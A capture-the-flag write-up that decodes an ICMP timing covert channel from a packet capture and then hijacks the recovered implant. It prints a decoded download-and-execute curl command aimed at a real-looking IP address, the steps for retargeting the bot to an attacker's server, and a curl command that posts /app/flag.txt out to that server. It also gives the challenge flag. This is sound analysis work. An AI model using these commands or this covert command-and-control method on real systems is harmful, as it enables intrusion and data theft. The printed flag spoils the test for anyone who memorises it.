$ cat writeup.md…
$ cat writeup.md…
alfactf
Task: analyze an ICMP-only PCAP where commands are hidden in echo-reply timing, recover the second-stage implant logic, retarget the bot with add <ip>, then control it via delayed ICMP replies and exfiltrate /app/flag.txt over HTTP.
Category: forensics / network / malware
Status: solved
Flag: alfa{HIdE_y0uR_AC7IvItY_ANd_bE_sAFe}
The PCAP contains only ICMP echo request/reply traffic between the victim and a controller. The useful data is hidden in the reply timing:
~0.1s = bit 0~0.5s = bit 1~0.3s = sync / frame separatorDecoding the capture reveals two NUL-terminated strings:
ok exec curl -o /tmp/.x http://157.180.44.191:8080/client_bin; chmod +x /tmp/.x; /tmp/.x; rm -f /tmp/.x
So the original controller used ICMP timing to instruct the victim to fetch and run a second-stage binary.
The capture has only two flows:
46.62.209.189 -> 157.180.44.191 ICMP echo request157.180.44.191 -> 46.62.209.189 ICMP echo replyIf we pair request/reply packets by ICMP id/seq and measure the delay, the timing stream splits into frames separated by ~0.3s. Inside a frame:
< 0.3s → 0>= 0.3s → 1Reading 8 bits MSB-first reconstructs the command strings above.
The URL from the decoded command serves an ELF binary called client_bin.
Useful strings/symbols show the protocol logic:
add exec server exec ignored: %sexec from %s mid=%d: %ssend_some_requestsend_some_reply/bin/bashThis reveals two modes:
The implant can receive a timing-encoded bot command directly. The important one is:
add <ip>
After receiving add <ip>, the victim starts pinging that IP itself.
Once the victim is pinging the chosen host, that host can reply with delayed ICMP echo replies. In this mode, exec ... is accepted and executed.
So the attack is:
add <our-public-ip> to the victim;exec ...;To reproduce the exploit, a Linux VPS with a public IPv4 address was used.
One critical step is disabling normal kernel ICMP echo replies so they do not break the timing channel:
sysctl -w net.ipv4.icmp_echo_ignore_all=1
The custom controller must send ICMP echo-reply packets that preserve:
idseqOnly the timing changes.
Then a bot command is sent to retarget the implant:
add <VPS_IP>
After that, the victim begins pinging the VPS and can be controlled through delayed ICMP replies.
A short probe command was used first:
exec curl http://<VPS_IP>/x1
This produced a request from the victim to the HTTP listener, confirming that the retargeting and ICMP controller both worked.
For repeated commands, sending exec ... without an initial ok frame was the most reliable behavior in reproduction.
The participant solution suggested the flag path was /app/flag.txt. The final command used was:
exec curl -d@/app/flag.txt http://<VPS_IP>/
The HTTP listener received the POST body:
alfa{HIdE_y0uR_AC7IvItY_ANd_bE_sAFe}
client_bin.add <VPS_IP> to the victim.exec curl -d@/app/flag.txt http://<VPS_IP>/.<VPS_IP>.$ cat /etc/motd
Liked this one?
Pro unlocks every writeup, every flag, and API access. $9/mo.
$ cat pricing.md$ grep --similar